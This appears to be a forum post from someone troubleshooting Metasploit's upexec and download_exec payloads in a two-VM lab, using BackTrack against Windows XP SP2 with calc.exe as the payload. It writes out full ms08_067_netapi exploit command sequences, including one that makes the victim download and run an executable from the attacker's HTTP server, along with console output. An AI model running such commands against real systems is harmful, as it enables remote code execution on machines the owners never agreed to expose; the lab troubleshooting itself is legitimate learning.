Metasploit Payload Upexec / Download_exec Not Working?


HiramKey

I have never explored the upexec and download_exec payloads of the Metasploit Framework.

So the purpose of the test is to download / upload and execute an exe file as payload.

To make some tests I’m using two VMs, one with BT4 RC2 and one with XP SP2 as the victim.

The victim has the firewall disabled and no antivirus.

I’m trying to upload/download and execute the Windows calculator (calc.exe).

I know that with a Meterpreter session it is possible with a simple upload and execute, but I’m experiencing some problems with both of the following procedures:

1 ------------ WITH UPEXEC:

use exploit/windows/smb/ms08_067_netapi

set payload windows/upexec/reverse_tcp

set lhost 192.168.1.1

set rhost 192.168.1.2

set pexec /root/data/payloads/test/calc.exe

exploit

I got…

Started reverse handler on 192.168.1.1:4444

Automatically detecting the target...

Fingerprint: Windows XP - Service Pack 2

Selected Target: Windows XP SP2 (NX)

Attempting to trigger the vulnerability...

Sending stage (398 bytes) to 192.168.1.2

Sleeping before handling stage...

And it hangs like that without any result; the victim does not run calc.exe.

2 ------------ WITH DOWNLOAD_EXEC:

use exploit/windows/smb/ms08_067_netapi

set payload windows/download_exec

set lhost 192.168.1.1

set rhost 192.168.1.2

set url http://192.168.1.1/c.exe (httpd obviously active)

exploit

I got…

Automatically detecting the target...

Fingerprint: Windows XP - Service Pack 2

Selected Target: Windows XP SP2 (NX)

Attempting to trigger the vulnerability...

Exploit completed, but no session was created.

Even in that case the exe will not be executed on the victim…

So I think I’m missing something:

1. Am I doing something wrong with the procedure?

2. Does a win32 exe need to be pre-encoded in a different format to be injected?

Is somebody here in the community able to use that payload and kind enough to help me?

Namasté.
